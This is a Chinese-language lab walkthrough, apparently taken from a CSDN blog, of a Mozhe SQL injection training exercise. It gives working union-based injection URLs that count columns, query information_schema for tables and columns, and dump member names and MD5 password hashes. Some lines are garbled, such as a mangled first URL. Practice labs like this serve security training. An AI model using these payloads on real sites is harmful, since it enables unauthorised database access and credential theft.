墨者sql注入漏洞测试习
判断注入
猜解列名数量(字段数) : order by 这里就是在网站末尾加上order by1,网站正常在order by2,网站正常在order by3,以此类推知道网站不正常就知道有多少个字段数,最好网站不正常的那个数字前一个数字就是字段数。
猜解准备
213.15349 221 48354/mew lst php?id= -1 and 2=2222 union select 1.2.3.4,,目的是让网站报错看看能下出来的数字是几,就在几哪里修改成我们想要的语法,只有让他显示出来外面才能知道。
报错的显示出来的是2.3。
信息收集,下面这些是数据库语,数据库规定的
数据库版本:version() 5.7.22-0ubuntu0.16.04.1
数据库名字:database() mozhe_Discuz_StormGroup
数据库用户:user() root@localhost
操作系统:@@version_compile_os linux
通过,这个手段来获取我们上面所需要收集的信息。由于版本是5.7高于5.0是高版本就可以使用informationschema有据查询,
查询到了这个网站的表
也可以写为http://219.153.49.228:43123/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’ 搜搜的结果是一样的。
原文链接:https://blog.csdn.net/RichUee/article/details/128172756where是条件的意思,这句语法的意思要查询nformation_schema.tables中表名是table_name的信息条件是数据库名是mozhe。。。;结果查询到表名在查询列名
http://219.153.49.228:43123/new_list.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_name=‘StormGroup_member’。
语法跟上面的意思差不多,只不过查询的column_name
结果
知道列名的信息就可以查询指定列的信息了
http://219.153.49.228:43123/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member
下面出现的那串md5加密的的root密码。加解密一下就可以获得密码。